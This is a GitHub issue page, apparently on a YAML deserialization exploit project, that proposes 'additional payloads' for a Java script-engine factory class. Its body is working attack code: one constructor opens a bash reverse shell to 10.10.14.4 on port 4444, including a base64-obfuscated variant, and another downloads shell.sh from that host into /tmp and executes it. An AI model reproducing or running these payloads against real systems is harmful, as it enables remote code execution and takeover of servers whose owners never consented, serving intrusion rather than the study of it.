Skip to content

Additional Payloads #3

New issue
New issue
Open
Open
Additional Payloads#3
Assignees
copilot-swe-agent
@ghost

Description

@ghost
ghost
opened on Feb 15, 2021

Additional Examples of Payloads:
yaml-payload/src/artsploit/AwesomeScriptEngineFactory.java

public AwesomeScriptEngineFactory() {
    String [] cmd={"bash","-c","bash -i >& /dev/tcp/10.10.14.4/4444 0>&1"};
    String [] jex={"bash","-c","{echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"};
    try {
        Runtime.getRuntime().exec(cmd);
        Runtime.getRuntime().exec(jex);
        Runtime.getRuntime().exec("echo $jex");
    } catch (IOException e) {
        e.printStackTrace();
    }
}

Putting a try-catch around every command:

public AwesomeScriptEngineFactory() {
    RunCmd("curl 10.10.14.4/shell.sh -o /tmp/shell.sh");
    RunCmd("bash /tmp/shell.sh");
}

public String RunCmd(String Cmd) {
    try {
        Runtime.getRuntime().exec(Cmd);
    } catch (IOException e) {
        e.printStackTrace();
    }
    return null;
}

Metadata

Metadata

Assignees

Labels

No labels
No labels

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions